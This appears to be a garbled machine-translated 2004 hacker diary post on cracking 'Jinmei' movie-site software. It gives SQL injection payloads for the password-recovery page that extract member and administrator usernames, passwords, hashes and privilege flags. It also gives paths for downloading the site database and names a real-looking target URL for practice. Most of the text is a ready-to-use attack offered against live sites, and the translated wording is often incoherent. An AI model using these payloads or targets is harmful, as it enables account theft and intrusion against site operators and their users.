Jinmei movie system cracked notes (crack rate more than 80%) _ Vulnerability Research

Jinmei movie system cracked notes (crack rate 80% or more)
Copy from my hacker diary in 265.com, absolutely treasured!!!!!!!!
If I ever get a chance, I'll publish my diary.

Jinmei 3 is almost non-existent, if any can be used

Golden Eye (last 14 in the background that has uploaded the registered version)
It's not going to work. The Golden Eye Animation tutorial of the Strange Dog

Or a stinky beggar who writes the best guess. SQL Injector (This is a good thing AH)



There are some summaries of the following things that are basically looking at
A summary of the 4 and 5 phases of the hacker x file
All Jinmei versions of the Web now appear to be effective!!!!!!
But those toll stations are all lies, inside are all stolen even, bad even!!!!!!!!!
I cracked the n sites, only a few are good

Pay special attention to!!!! : The code was injected into the user/wantpws.asp page.

You registered user name: Lamianbu
Password hint question: Lamianbu
Close friend Tip answer: (Fill in the code in Method 1 and Method 2)

In fact, the first two, and the beginning of the third item casually filled, not the same line
I'll fill in a.

and pay attention to!!!!.
Back to page "Your password is" is not the password!!!!!!!!!!

For example, 2 of the first three times, respectively,

ID (no use)
User name (log in)
Password (log in)



Jinmei 4SQL Injection

Mood: 2004-5-14-21:58:26 Clear Friday collection:


Login.asp
Register
Advanced Administrator Login. By name:, Password:,


Register Advanced Administrator Login. By name:, Password:,



User/wantpws.asp
If you forget your password,
If you have forgotten your password, please enter your password hint letter in the form below.
Interest!. You register username: password hint question: Close friend prompt answer:. Return to the first
Page.


Method 1

User name must be registered:
Lamianbu ' Union select userid from users where oklook=3 or ' 0

Oklook=x
0 Tour 1 2 White 3 Yellow 4 drill (4 hand 5 drill)

Get the password (may not correspond, so recommend Method 2):
User name ' or ' 1=1 at registered username



Method 2

User ID is xxx:
Lamianbu ' union select ID from users where oklook=3 or ' 0

ID to the application user name:
Lamianbu ' Union select userid from users where id=xxx or ' 0

The ID corresponds to the password:
Lamianbu ' Union select password from users where id=xxx or ' 0


Administrator user name:
Lamianbu ' Union select name from password where id>=1 or ' 0

Admin Password: (Jinmei 4 has MD5 encryption, see is 16-bit garbled)
Lamianbu ' Union select pwd from password where id>=1 or ' 0

Table Name: Jinmei 4 is: FDG85675FD
Membership Version: password
Some versions are: Okwiantgo

To verify Administrator permissions:
Lamianbu ' Union select flag from password where id>=1
Return 1 Super, 2 High, 3 early, 4 no

Login.asp
Findaccount.asp
Construct a variable absolute path
Findaccount.asp?name=xxx&pwd=xxx


Internet Express Database:
Movie/admin9988.asp
Jinmei 4 is: data/admin2000.asp or data/admin2002.asp
Change to Admin9988.mdb after downloading
Take this page and practice practicing.
Solve the gold account and password please do not modify and publish (later people also want to practicing AH)
Log in and remember to quit landing (an account cannot be used at the same time).
Http://www.westedu.org/mov/USER/wantpws.asp
More Jinmei go to Google to find

Actually, the Jinmei system doesn't have this page.
Construct a similar version of the same page for injection